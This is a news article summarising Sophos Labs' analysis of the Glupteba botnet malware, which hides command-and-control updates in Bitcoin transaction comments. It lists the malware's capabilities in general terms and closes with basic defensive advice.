Glupteba, a sneaky malware that can be controlled from afar includes a range of components to cover its tracks, and it updates itself using encrypted messages hidden in the Bitcoin blockchain, write cybersecurity experts from Sophos Labs.
The Glupteba bot is a malware campaign that creates backdoors with full access to contaminated devices, which are added to its growing botnet. The analysis describes it as a “highly self-defending malware” with “enhancing features that enable the malware to evade detection.”
The most interesting aspect of Glupteba is that it uses the Bitcoin blockchain as a communication channel for receiving updated configuration information, given that bitcoin transactions can also include a comment of up to 80 characters.
Glupteba uses this messaging space for encrypted messages. These messages contain secrets, such as command-and-control server names, thus cleverly hiding them in the public blockchain – in plane sight.
Other notable capabilities of Glupteba include:
- A cryptojacker, which enables it to act as a management tool for secretive crypto-miners.
- A rootkit that helps it to avoid detection by keeping malware files off the radar if loaded successfully.
- A virus to distribute itself automatically across your network.
- A security suppressor that does its best to turn Windows Defender off.
- A browser stealer that goes after local Chrome, Firefox, Yandex, and Opera data files.
- A router attack tool to exploit popular home and small business routers to attack other people.
The complex malware is still under constant development, and it seems it has a goal to infect as many computers as possible.
The report authors write:
“With the use of its exhaustive backdoor functions, Glupteba can download a wide variety of other malware, while collecting a large amount of information from the victim’s computer. Even today, Glupteba drops cryptocurrency miners and browser stealer components, attacks MikroTik routers, and leverages its proxy components to conceal which binary is communicating with the outside world.”
Jameson Lopp, CTO at crypto security specialist Casa and bitcoin developer, described the malware as “an unstoppable dapp”:
Put your botnet’s command & control infrastructure on a censorship resistant distributed database? That’s what I call an unstoppable dapp! https://t.co/qDptVF3YNO
— Jameson Lopp (@lopp) June 24, 2020
This sophisticated malware is just another example of a non-monetary use case of the Bitcoin and its uncensorable public ledger that also includes virtual powerplants and open digital ID (DID) systems.
To protect yourself oneself, Sophos Labs suggests the following security practices:
- Patch early and often. Make sure that your operating system, apps, and related devices like routers or servers are always up to date.
- Use a decent anti-virus with web filtering.
- Stay away from hookey software (cracked programs that you can download on the web for free instead of paying for a licensed version), as it is likely to be infected with malware.
How Working From Home May Be Exposing Us To Cybercrime
Banking Trojans Could Be Used to Target Your Wallet & Crypto Exchange
Crypto 2020: Security Trends Next Year and Beyond
How to Protect Your Absolute Crypto Lifeline – Seed Words